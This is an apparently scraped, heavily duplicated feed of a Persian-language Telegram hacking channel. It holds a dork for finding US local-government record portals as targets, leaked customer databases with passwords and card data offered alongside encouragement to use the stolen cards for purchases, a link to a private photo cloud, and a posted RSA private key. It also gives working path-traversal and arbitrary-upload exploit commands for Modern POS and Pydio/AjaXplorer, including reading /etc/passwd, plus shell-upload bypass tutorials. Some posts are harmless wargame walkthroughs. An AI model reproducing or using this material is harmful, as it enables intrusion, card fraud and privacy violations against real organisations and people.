#Dork - #Cott_System ( Cott System) - #Local_Goverment_Document (s)
//\\//\\//\\//\\//\\//\\//\\//\\//\\
Dork = {
| - > cott system :
یکی از سیستم های مدیریت دولتی مدارک محلی در ایالات امریکا میباشد.
بادورک بالا میتونید به پنل جستجوی این اطلاعات دست پیدا کنید و اطلاعات مهمی از جمله :
- دفاتر اداری
- اطلاعات شخصی
- اطلاعات املاک (مالیات، بدهی، وام و غیره)
- موتورهای جستجو داخلی
- Foothold در وب سایت های آسیب پذیر .gov
دوستان معمولا امنیت این سیستم ها به خوبی تامین نمیشود و شما میتوانید ازشون باگ های سطح بالا بیرون بکشید.
باتشکر.
//\\//\\//\\//\\//\\//\\//\\//\\//\\
@ t.me/LearnExploit
@ IR0Day.Today Boy's
//\\//\\//\\//\\//\\//\\//\\//\\//\\
Dork = {
intext:" - 2019 Cott Systems, Inc."
}| - > cott system :
یکی از سیستم های مدیریت دولتی مدارک محلی در ایالات امریکا میباشد.
بادورک بالا میتونید به پنل جستجوی این اطلاعات دست پیدا کنید و اطلاعات مهمی از جمله :
- دفاتر اداری
- اطلاعات شخصی
- اطلاعات املاک (مالیات، بدهی، وام و غیره)
- موتورهای جستجو داخلی
- Foothold در وب سایت های آسیب پذیر .gov
دوستان معمولا امنیت این سیستم ها به خوبی تامین نمیشود و شما میتوانید ازشون باگ های سطح بالا بیرون بکشید.
باتشکر.
//\\//\\//\\//\\//\\//\\//\\//\\//\\
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#DataBase - #Informations - #Users - #BankCarts
————————
اطلاعات یک مرکز خرید :::
در این دیتابیس اطلاعاتی از قبیل :::
- User or email
- Passwd
- IP
- Card info
- contact info
and etc
کاربران رو پیدا کنید. 😶🤞🏼
از کارت بانکی کاربران میتوانید برای خرید های اینترنتی سایت های خارجی استفقاده کنید.😁
————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
————————
اطلاعات یک مرکز خرید :::
soluagro.com.br
در این دیتابیس اطلاعاتی از قبیل :::
- User or email
- Passwd
- IP
- Card info
- contact info
and etc
کاربران رو پیدا کنید. 😶🤞🏼
از کارت بانکی کاربران میتوانید برای خرید های اینترنتی سایت های خارجی استفقاده کنید.😁
————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
soluagro.com.br.txt
27.8 KB
#DataBase - #Informations - #Users - #BankCarts
————————
اطلاعات یک مرکز خرید :::
در این دیتابیس اطلاعاتی از قبیل :::
- User or email
- Passwd
- IP
- Card info
- contact info
and etc
کاربران رو پیدا کنید. 😶🤞🏼
از کارت بانکی کاربران میتوانید برای خرید های اینترنتی سایت های خارجی استفقاده کنید.😁
————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
————————
اطلاعات یک مرکز خرید :::
soluagro.com.br
در این دیتابیس اطلاعاتی از قبیل :::
- User or email
- Passwd
- IP
- Card info
- contact info
and etc
کاربران رو پیدا کنید. 😶🤞🏼
از کارت بانکی کاربران میتوانید برای خرید های اینترنتی سایت های خارجی استفقاده کنید.😁
————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#OwnCloud
=====================
کلود شخصی 😐👇🏻
انصافا عکسای خوبی دارن 😂
@ t.me/LearnExploit
@ IR0Day.Today Boy's
=====================
کلود شخصی 😐👇🏻
http://mojoblak.srce.hr/public.php?service=gallery&t=dfe03374128a186ec837884e47b6c056
انصافا عکسای خوبی دارن 😂
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Database - #Site - #Config
————————————-
دیتابیس و کل کانفیگ های سایت :::
————————————-
@ t.me/LearnExploit
@ IR0Day.Today Boy's
————————————-
دیتابیس و کل کانفیگ های سایت :::
lider.com.pe
پسرود به صورت هش شدس کرک کنید...————————————-
@ t.me/LearnExploit
@ IR0Day.Today Boy's
lider.com.pe.sql
10.9 MB
#Database - #Site - #Config
————————————-
دیتابیس و کل کانفیگ های سایت :::
————————————-
@ t.me/LearnExploit
@ IR0Day.Today Boy's
————————————-
دیتابیس و کل کانفیگ های سایت :::
lider.com.pe
پسورد به صورت هش شدس کرک کنید...————————————-
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Hackertest ( #Hackertest_net ) #Part_6 (6)
——————————————-
سلام خدمت دوستان عزیز با قسمت یا جلسه ی ششم از سری اموزش های تست نفوذ در سایت
خب دوستان همونطور که در اموزش های قبلی اشاره شد برای پیدا کردن پسورد وارد سورس پیج شوید ( بدون مشکل میتونید وارد سورس شد.)
2 - __بعده اینکه وارد سورس پیج شدید باید موارد
alert
یا
prompt
رو جستجو کنید. شاید بپرسید چرا ؟
خب باید در جواب بگم که چون ورودی پسورد با این تگ ها تعریف شده و امکان اینکه پسورد به صورت یه شرط در کنار این مقادیر تعریف شده باشه زیاد است
اما
** = > با جستجو میبینید که به نتیجه ای نمیرسید...
خب پس چاره چیست !
برای اینکه به نتیجه برسید باید دنبال کد های جاوااسکریپت باشید (چون پسورد خواسته شده به صورت تگ های جاوااسکریپتی میباشد)
خب با کمی دقت با لاین :::
`<SCRIPT SRC="psswd.js"
همونطور که میبینید وقتی مفسر به این قسمت میرسه برنامه نویس با استفاده از تگ :::
مفسر رو به یک محل دیگه ای هدایت کرده.
اگر وارد
`passwd.js`
شویم
با کد های
و طبق اموزش های گذشته میفهمیم که پسورد ::
امیدبر ان است که مفید واقع شده باشد.
========================
دانلود قسمت های قبلی :::
1 - Part 1
//———-
2 - Part 2
//———-
3 - Part 3
//———-
4 - Part 4 and 5
=========================
@ t.me/LearnExploit
@ IR0Day.Today Boy's
——————————————-
سلام خدمت دوستان عزیز با قسمت یا جلسه ی ششم از سری اموزش های تست نفوذ در سایت
HackerTest
با شما هستیم.خب دوستان همونطور که در اموزش های قبلی اشاره شد برای پیدا کردن پسورد وارد سورس پیج شوید ( بدون مشکل میتونید وارد سورس شد.)
2 - __بعده اینکه وارد سورس پیج شدید باید موارد
alert
یا
prompt
رو جستجو کنید. شاید بپرسید چرا ؟
خب باید در جواب بگم که چون ورودی پسورد با این تگ ها تعریف شده و امکان اینکه پسورد به صورت یه شرط در کنار این مقادیر تعریف شده باشه زیاد است
اما
** = > با جستجو میبینید که به نتیجه ای نمیرسید...
خب پس چاره چیست !
برای اینکه به نتیجه برسید باید دنبال کد های جاوااسکریپت باشید (چون پسورد خواسته شده به صورت تگ های جاوااسکریپتی میباشد)
خب با کمی دقت با لاین :::
`<SCRIPT SRC="psswd.js"
`LANGUAGE="JavaScript" type="text
/javascript"></script>
مواجه میشید همونطور که میبینید وقتی مفسر به این قسمت میرسه برنامه نویس با استفاده از تگ :::
SRC="another location"
(این تگ مسیر فایل رو برای ما معیین میکنه)مفسر رو به یک محل دیگه ای هدایت کرده.
اگر وارد
`passwd.js`
شویم
با کد های
<!--
var pass;
pass=prompt("Password:","");
if (pass=="hackertestz") {
window.location="included.htm";
}else
alert("Try again...");
//-->
مواجه میشیم و طبق اموزش های گذشته میفهمیم که پسورد ::
hackertestz
میباشد.امیدبر ان است که مفید واقع شده باشد.
========================
دانلود قسمت های قبلی :::
1 - Part 1
//———-
2 - Part 2
//———-
3 - Part 3
//———-
4 - Part 4 and 5
=========================
@ t.me/LearnExploit
@ IR0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
#Pentesting - #Part 1 - #hackertest_Net
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-s…
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-s…
0Day.Today | Learn Exploit | Zero World | Dark web |
#Hackertest ( #Hackertest_net ) #Part_6 (6) ——————————————- سلام خدمت دوستان عزیز با قسمت یا جلسه ی ششم از سری اموزش های تست نفوذ در سایت HackerTest با شما هستیم. خب دوستان همونطور که در اموزش های قبلی اشاره شد برای پیدا کردن پسورد وارد سورس پیج شوید ( بدون…
دوستان مرحله ی هفتم نیز شبیه اینه
اگه کسی تونست این مرحله رو رد شه
فیلم بگیره بفرسته میذاریم کانال (با اسمه خودش)
— > @irdefacer
اگه کسی تونست این مرحله رو رد شه
فیلم بگیره بفرسته میذاریم کانال (با اسمه خودش)
— > @irdefacer
🔞Onion Domain🔞
zogsleydmnywqlcs.onion
❌Channel: t.me/LearnExploit
-----BEGIN RSA PRIVATE KEY-----
MIICWNngAAKBgQCiToTEfuZHu2YD1rkT584gvaU/qmshzkuHabqPsijasm
tGw30hsC2DnauW30mshcLEV+KXY40plY10msdfJwz430h
mqWlo20/g7cKkylQjINVeZE33zCjAxQBCcqki82LkWtz/hDGGDgv3vVJwBwIDAQAB
AoGBAJxo9mE1uU0fNqw0XJ7mICpFF94KL46HCqVtmvw4wjn4uJ/9X6ujNxPUB1K+
mWPm5gPP0UmSPRkZQM7Xu4iks9e/YAv37RI8WxUeHzncfhD79fsd3iRimDlibr/q
+tdCtCjTNwlY4iORNHzRl4yb1Lp1ldDZ1p6oogtrTtzBpYlhAkEAz47ZI28eL2PL
MBvRkEmmxpW8WCDE5u/hGygg76IWnSt2PvPS/USR2qRnedDPDKfDq5duH6QYyS1z
Jkc82W7HUwJBAMgwAGypMoPLOiw4trNoJs50kKFpVFYHP4ezOMt68DcRYMLQ39xQ
N+YaLCmGIxwx03WU3CtFH9791NEwiRRLYf0CP32q/810edI3mc6HCVtTPKcAAglZ
zd4FX0YSBd8RRJ/ksLNs7VJrMeQvpnca9kGzUcWS6ho+QMONwSpr92uupwJAAqFG
0Cak6EBaQkx4cgDzSZEUeVpl5j9wITtEir/Ruhd7WvPdjQpswZQkcmM1wOAStB/B
iLv+wDI7gogNtPuMjQJAJHf7AV06RFBuhVcaloAmpSoe6BQeP0RNr5YybMOgM6bi
+wk8gHa56/Oj1HVO0aDSVVucDeBYBqtxHEJ6kWNu4Q==
-----END RSA PRIVATE KEY-----
zogsleydmnywqlcs.onion
❌Channel: t.me/LearnExploit
-----BEGIN RSA PRIVATE KEY-----
MIICWNngAAKBgQCiToTEfuZHu2YD1rkT584gvaU/qmshzkuHabqPsijasm
tGw30hsC2DnauW30mshcLEV+KXY40plY10msdfJwz430h
mqWlo20/g7cKkylQjINVeZE33zCjAxQBCcqki82LkWtz/hDGGDgv3vVJwBwIDAQAB
AoGBAJxo9mE1uU0fNqw0XJ7mICpFF94KL46HCqVtmvw4wjn4uJ/9X6ujNxPUB1K+
mWPm5gPP0UmSPRkZQM7Xu4iks9e/YAv37RI8WxUeHzncfhD79fsd3iRimDlibr/q
+tdCtCjTNwlY4iORNHzRl4yb1Lp1ldDZ1p6oogtrTtzBpYlhAkEAz47ZI28eL2PL
MBvRkEmmxpW8WCDE5u/hGygg76IWnSt2PvPS/USR2qRnedDPDKfDq5duH6QYyS1z
Jkc82W7HUwJBAMgwAGypMoPLOiw4trNoJs50kKFpVFYHP4ezOMt68DcRYMLQ39xQ
N+YaLCmGIxwx03WU3CtFH9791NEwiRRLYf0CP32q/810edI3mc6HCVtTPKcAAglZ
zd4FX0YSBd8RRJ/ksLNs7VJrMeQvpnca9kGzUcWS6ho+QMONwSpr92uupwJAAqFG
0Cak6EBaQkx4cgDzSZEUeVpl5j9wITtEir/Ruhd7WvPdjQpswZQkcmM1wOAStB/B
iLv+wDI7gogNtPuMjQJAJHf7AV06RFBuhVcaloAmpSoe6BQeP0RNr5YybMOgM6bi
+wk8gHa56/Oj1HVO0aDSVVucDeBYBqtxHEJ6kWNu4Q==
-----END RSA PRIVATE KEY-----
#شکست #ماهواره #پیام
————-
شکست ماهواره ی پیام در پرتاب به فضا
#تاسف برای #مسئولان #علم و #صنعت
واقعا برای مسولان تاسف میخورم !!
بجای اینکه #مسئولان تو عرصه های مختلف علمی و روی نیرو های جوان سرمایه گذاری کنند میان چند روز و چند شب مردم و برای گفتن یه #مرگ_بر_امریکا ی ساده میریزن خیابونا !!
خیلی عرضه دارید در حد امریکا از مردم و از نیروی جوان کشور حمایت کنید.
اون موقع هست که اگه #مرگ_بر_امریکا هم نگیم خودبه خود این اتفاق میوفته.
باشد که درسه درستی گرفته باشید.
تا بجای پسروی ( عملیات فیلترینگ و کند کردن سرعت اینترنت) پیشروی کنیم .
امید بر ان است که مورد توجه مسئولان قرار گرفته باشد.
———————-
@LearnExploit
————-
شکست ماهواره ی پیام در پرتاب به فضا
#تاسف برای #مسئولان #علم و #صنعت
واقعا برای مسولان تاسف میخورم !!
بجای اینکه #مسئولان تو عرصه های مختلف علمی و روی نیرو های جوان سرمایه گذاری کنند میان چند روز و چند شب مردم و برای گفتن یه #مرگ_بر_امریکا ی ساده میریزن خیابونا !!
خیلی عرضه دارید در حد امریکا از مردم و از نیروی جوان کشور حمایت کنید.
اون موقع هست که اگه #مرگ_بر_امریکا هم نگیم خودبه خود این اتفاق میوفته.
باشد که درسه درستی گرفته باشید.
تا بجای پسروی ( عملیات فیلترینگ و کند کردن سرعت اینترنت) پیشروی کنیم .
امید بر ان است که مورد توجه مسئولان قرار گرفته باشد.
———————-
@LearnExploit
#Pentesting Dvwa
#Part_1 (1)
how to install #DVWA (Damn Vulnerable Web Application ) - on the #Wamp #Server
————————————
دوره ی تست نفوذ باگ ها با برنامه DVWA
جلسه ی : ۱
اموزش نصب DVWA روی ومپ سرور و معرفی ان ::::
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Part_1 (1)
how to install #DVWA (Damn Vulnerable Web Application ) - on the #Wamp #Server
————————————
دوره ی تست نفوذ باگ ها با برنامه DVWA
جلسه ی : ۱
اموزش نصب DVWA روی ومپ سرور و معرفی ان ::::
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
How to install DVWA on the wamp.rar
69.4 MB
#Pentesting Dvwa
#Part_1 (1)
how to install #DVWA (Damn Vulnerable Web Application ) - on the #Wamp #Server
————————————
دوره ی تست نفوذ باگ ها با برنامه DVWA
جلسه ی : ۱
اموزش نصب DVWA روی ومپ سرور و معرفی ان ::::
— دوستانی که میخوان روی Xampp سرور نصب کنن میتونن به راهتی با یه سرچ ساده اموزششو پیدا کنن (البته روش نصب روی xampp در خود راهنمای فایل قرار داده شده)
روش تو هردو یکسان هست چون تو سطح نت اموزش نصب روی wamp نبود رکورد کردم
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Part_1 (1)
how to install #DVWA (Damn Vulnerable Web Application ) - on the #Wamp #Server
————————————
دوره ی تست نفوذ باگ ها با برنامه DVWA
جلسه ی : ۱
اموزش نصب DVWA روی ومپ سرور و معرفی ان ::::
— دوستانی که میخوان روی Xampp سرور نصب کنن میتونن به راهتی با یه سرچ ساده اموزششو پیدا کنن (البته روش نصب روی xampp در خود راهنمای فایل قرار داده شده)
روش تو هردو یکسان هست چون تو سطح نت اموزش نصب روی wamp نبود رکورد کردم
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's
#Arbitrary #File #Download #LFI #RFI #Modern_POS v1.3
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::
_inc/bridges/php-local/index.php?action=download&path=../../../config.php
_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
http://localhost/[PATH]/
این قسمت دامین شما یا تارکت میباشد._inc/bridges/php-local/index.php
?action=download&path=
با اضافه کردن این قسمت به اخر دامین به محل اسیب پذیری دسترسی پیدا میکنید.[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::
_inc/bridges/php-local/index.php?action=download&path=../../../config.php
_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)
CodeCanyon
Modern POS - Point of Sale with Stock Management System
Modern POS is built with core PHP, jQuery and Angular JS and Others modern technology. There are many attractive features that will help you to manage stock and sales of your shop easily.
...
...
#Hackertest ( #Hackertest_net ) #Part_7 part 7
———————————————-
با سلام و خسته نباشید خدمت دوستان.
|- جلسه ی هفتم از سری اموزش های تست نفوذ در سایت `HackerTest.Net `در خدمت شما هستیم :
مراحل و نحوه ی پیدا کردن پسورد ::
1 - وارد سورس پیج شوید در level 7
2 - با کمی دقت میبینید که نتیجه ای از کد های موجود در جاوا اسکریپت و بخش form بدست نیاوردید.
پس باید user and pass مد نظر ما در قسمتی از بکگراند باشه یا در محلی خارج از این سورس (همون قضیه ی تگ SRC در جلسه ی قبلی)!
خب بعد از مطالعه ی کد ها میبینیم که user and pass مد نظر در محل دیگری از سورس نیس !
پس احتمال اینکه در بکگراند باشه زیاد میشه.
نکته : اگر بخوایید دنبال چیزی در بکگراند باشید باید به تگ body رفته در ان قسمت جستجو کنید.
با مطالعه این تگ میفهمیم که برنامه نویس
در بخش
احتمال اینکه user and pass در این عکس باشه زیاده (شرایط خاص در sqli !)
3 - برای اینکه وارد قسمتی که عکس یا همان گیف در ان قرار دارد وارد شویم کافیه بخش :
یعنی چیزی شبیه به زیر :
User :
باتشکر ادمین کانال 0Day.Today .
———————
1 - Part 1
(https://t.me/LearnExploit/370)
//———-
2 - Part 2
(https://t.me/LearnExploit/373)
//———-
3 - Part 3
(https://t.me/LearnExploit/380)
//———-
4 - Part 4
(https://t.me/LearnExploit/513)
// ———-
5 - Part 6
(https://t.me/LearnExploit/524)
——————————————
linux@0day:~#./@LearnExploit
IR0Day.Today Boy's
———————————————-
با سلام و خسته نباشید خدمت دوستان.
|- جلسه ی هفتم از سری اموزش های تست نفوذ در سایت `HackerTest.Net `در خدمت شما هستیم :
مراحل و نحوه ی پیدا کردن پسورد ::
1 - وارد سورس پیج شوید در level 7
2 - با کمی دقت میبینید که نتیجه ای از کد های موجود در جاوا اسکریپت و بخش form بدست نیاوردید.
پس باید user and pass مد نظر ما در قسمتی از بکگراند باشه یا در محلی خارج از این سورس (همون قضیه ی تگ SRC در جلسه ی قبلی)!
خب بعد از مطالعه ی کد ها میبینیم که user and pass مد نظر در محل دیگری از سورس نیس !
پس احتمال اینکه در بکگراند باشه زیاد میشه.
نکته : اگر بخوایید دنبال چیزی در بکگراند باشید باید به تگ body رفته در ان قسمت جستجو کنید.
با مطالعه این تگ میفهمیم که برنامه نویس
در بخش
bg="images/included.gif"
یک عکس در بکگراند تعریف کرده !احتمال اینکه user and pass در این عکس باشه زیاده (شرایط خاص در sqli !)
3 - برای اینکه وارد قسمتی که عکس یا همان گیف در ان قرار دارد وارد شویم کافیه بخش :
images/included.gif
گرفته و به اخر Url سایت اضافه کنیم یعنی چیزی شبیه به زیر :
http://www.hackertest.net/images/included.gif
4 - اگر دقت کنید user and pass در قسمت سمت راست و پایین برای ما قرار داده شده.User :
phat
Pass : jerkeybar3
امید وارم که از این قسمت هم نهایت استفاده روکنید دوستان.باتشکر ادمین کانال 0Day.Today .
———————
1 - Part 1
(https://t.me/LearnExploit/370)
//———-
2 - Part 2
(https://t.me/LearnExploit/373)
//———-
3 - Part 3
(https://t.me/LearnExploit/380)
//———-
4 - Part 4
(https://t.me/LearnExploit/513)
// ———-
5 - Part 6
(https://t.me/LearnExploit/524)
——————————————
linux@0day:~#./@LearnExploit
IR0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
#Pentesting - #Part 1 - #hackertest_Net
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-s…
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-s…
❤1
☘️🍀🌱🌿🍃🌵
🌷🌹🥀🌺💐
🍂🍁💐🌾
🌸🌼🌻
💫⭐️
🔥
#سوپرایز #سوپرایز
همچنان که دوره های Hackertest.net
و تست نفوذ با DVWA در کانال ادامه دارد
سوپرایز ویژه ای هم در راه هست
😁
منتظر سوپرایزهای ویژه ای باشید.☢️
کانال مارو به دوستاتون معرفی کنید :
🆔 : @LearnExploit
🆔 : @IR0Day_Today
🔥
💫⭐️
🌸🌼🌻
🍂🍁💐🌾
🌷🌹🥀🌺💐
☘️🍀🌱🌿🍃🌵
🌷🌹🥀🌺💐
🍂🍁💐🌾
🌸🌼🌻
💫⭐️
🔥
#سوپرایز #سوپرایز
همچنان که دوره های Hackertest.net
و تست نفوذ با DVWA در کانال ادامه دارد
سوپرایز ویژه ای هم در راه هست
😁
منتظر سوپرایزهای ویژه ای باشید.☢️
کانال مارو به دوستاتون معرفی کنید :
🆔 : @LearnExploit
🆔 : @IR0Day_Today
🔥
💫⭐️
🌸🌼🌻
🍂🍁💐🌾
🌷🌹🥀🌺💐
☘️🍀🌱🌿🍃🌵
0Day.Today | Learn Exploit | Zero World | Dark web | pinned «☘️🍀🌱🌿🍃🌵 🌷🌹🥀🌺💐 🍂🍁💐🌾 🌸🌼🌻 💫⭐️ 🔥 #سوپرایز #سوپرایز همچنان که دوره های Hackertest.net و تست نفوذ با DVWA در کانال ادامه دارد سوپرایز ویژه ای هم در راه هست 😁 منتظر سوپرایزهای ویژه ای باشید.☢️ کانال مارو به دوستاتون معرفی کنید : 🆔 : @LearnExploit 🆔 : @IR0Day_Today…»
💻⌨️🖥
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
اموزش burpSuit برای دور زدن uploader ها
#Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing
=====
@LearnExploit
--> 0Day.Today of TON
#Learning #BurpSuit on #Kalilinux (2018.2) for #Upladers #Bypassing
=====
@LearnExploit
--> 0Day.Today of TON
LeranExploit - File Upload Bypass.rar
25.7 MB
💻⌨️🖥
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
📲⌚️
📱
#Bypass #Uploader By Different #Method and Upload #Shell
————
سلام دوستان در خدمت شما هستیم با نحوه بایپس اپلودر ها با متد جدید :::
قابل توجه دوستان
در این فیلم که بر روی یکی از اپلودر ها تست میشود سعی بر این است که اپلودر را با استفاده از متد ها یا روش های زیر بایپس کنیم :
1 - اپلود فایل به صورت مستقیم
2 - اپلود فایل با تغییر نام (مانند :: PHP5 - Phtml - Php - PHp - PHP3 and ..)
3 - استفاده از Temper Data
که در هر سه حالت بالا اپلود نمیشه !
در این فیلم با یکی دیگر از متد های اپلود اشنا میشوید که میتونید روی اکثر اپلودر ها تست کنید و جواب بگیرید...
با تشکر.
⛓ برای اینکه سه روش قبلی رو یاد بگیرید روی اینجا کلیک کنید.
==============
@LearnExploit - 0DayBoy 's in Iran :)
🔺🔻🔸🔹🔶🔷
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
➖➖➖➖➖➖➖➖➖➖
#~Options :
گزینه ها :
option 1 :
اگر ajxp_action تنظیم (ست) نشده باشد، فایل content رو به قسمت files/id.format اپلود کنید.
در این مورد کد قبل از اینکه فرمت فایل ها رو چک کنه فایل رو به عنوان یک ارگومان به بخش move_uploded_file میده .
که این میتونه فرصتی برای اپلود فایل خودتون باشه...
نکته : برای اینکه توانایی موارد بالا رو داتشه باشید باید کاربر دسترسی لازم برای ادیت فایل رو داشته باشه.
option 2 :
اگر ajxp_action در بخش get_file تنظیم شده باشد (ست شده باشد)، شما میتوانید فایل رو از files/name بخوانید و بخش مد نظر رو حذف کنید !
که در این حالت دوباره کد نمیتونه پارامتر name رو تشخیص بده که این موردم میتونه باگ باشه.
➖➖➖➖➖➖➖➖➖➖
#~Filesdirectory's :
ادرس فایل :
ادرس پیشفرض فایل ها :
#~Read arbitrary files :
نحوه ی خواندن فایل :
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
مانند :
"http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
➖➖➖➖➖➖➖➖➖➖
#~Arbitrary File Upload :
نحوه ی اپلود فایل دلخواه :
curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
مانند :
curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"
➖➖➖➖➖➖➖➖➖➖
با تشکر از همراهان عزیز.
Software link
Exploit link
————————————-
@LearnExploit - 0DayBoy 's in Iran :)
🔳🔲▪️▫️◾️
⬜️⬛️◻️◼️
◽️♦️🗨
♠️♣️
✔️
#File #Upload #Vulnerability in #Pydio_AjaXplorer (Pydio/AjaXplorer) V 5.0.3 – 3.3.5
————————————-
#~Exploit Title : Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
آسیب پذیری فایل اپلود در (Pydio/AjaXplorer) ورژن 5.0.3 – 3.3.5
➖➖➖➖➖➖➖➖➖➖
#~Affected file :
فایل اسیب دیده : ( برای درک بهتر تصویر مطالعه شود !)
:::: `/plugins/editor.zoho/agent/save_zoho.php` ::::
